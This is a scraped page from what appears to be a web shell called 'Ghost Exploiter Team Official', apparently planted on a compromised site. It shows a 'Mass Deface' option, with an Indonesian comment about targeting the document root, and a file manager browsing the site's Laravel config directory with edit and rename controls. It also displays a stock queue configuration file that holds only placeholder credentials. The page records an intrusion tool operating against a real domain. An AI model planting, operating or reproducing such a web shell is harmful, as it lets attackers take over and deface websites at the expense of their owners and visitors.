webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
aminiwrc
/
portal.aminikamanpower.com
/
config
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
app.php
9.775KB
edt
ren
auth.php
3.207KB
edt
ren
broadcasting.php
1.566KB
edt
ren
cache.php
2.619KB
edt
ren
calling_codes.php
30.949KB
edt
ren
database.php
3.863KB
edt
ren
datatables.php
3.575KB
edt
ren
entrust.php
2.839KB
edt
ren
error_log
13.334KB
edt
ren
filesystems.php
2.5KB
edt
ren
froiden_envato.php
1.756KB
edt
ren
hashing.php
1.522KB
edt
ren
installer.php
1.208KB
edt
ren
laravel_google_translat
...
0.308KB
edt
ren
logging.php
2.168KB
edt
ren
mail.php
4.115KB
edt
ren
nexmo.php
2.813KB
edt
ren
queue.php
2.551KB
edt
ren
service.php
0.396KB
edt
ren
services.php
1.287KB
edt
ren
session.php
6.714KB
edt
ren
sluggable.php
4.4KB
edt
ren
tinker.php
0.466KB
edt
ren
translation-manager.php
1.444KB
edt
ren
trustedproxy.php
1.234KB
edt
ren
view.php
0.98KB
edt
ren
<?php return [ /* |-------------------------------------------------------------------------- | Default Queue Connection Name |-------------------------------------------------------------------------- | | Laravel's queue API supports an assortment of back-ends via a single | API, giving you convenient access to each back-end using the same | syntax for every one. Here you may define a default connection. | */ 'default' => env('QUEUE_DRIVER', 'sync'), /* |-------------------------------------------------------------------------- | Queue Connections |-------------------------------------------------------------------------- | | Here you may configure the connection information for each server that | is used by your application. A default configuration has been added | for each back-end shipped with Laravel. You are free to add more. | | Drivers: "sync", "database", "beanstalkd", "sqs", "redis", "null" | */ 'connections' => [ 'sync' => [ 'driver' => 'sync', ], 'database' => [ 'driver' => 'database', 'table' => 'jobs', 'queue' => 'default', 'retry_after' => 90, ], 'beanstalkd' => [ 'driver' => 'beanstalkd', 'host' => 'localhost', 'queue' => 'default', 'retry_after' => 90, ], 'sqs' => [ 'driver' => 'sqs', 'key' => env('SQS_KEY', 'your-public-key'), 'secret' => env('SQS_SECRET', 'your-secret-key'), 'prefix' => env('SQS_PREFIX', 'https://sqs.us-east-1.amazonaws.com/your-account-id'), 'queue' => env('SQS_QUEUE', 'your-queue-name'), 'region' => env('SQS_REGION', 'us-east-1'), ], 'redis' => [ 'driver' => 'redis', 'connection' => 'default', 'queue' => 'default', 'retry_after' => 90, 'block_for' => null, ], ], /* |-------------------------------------------------------------------------- | Failed Queue Jobs |-------------------------------------------------------------------------- | | These options configure the behavior of failed queue job logging so you | can control which database and table are used to store the jobs that | have failed. You may change them to any database / table you wish. | */ 'failed' => [ 'database' => env('DB_CONNECTION', 'mysql'), 'table' => 'failed_jobs', ], ];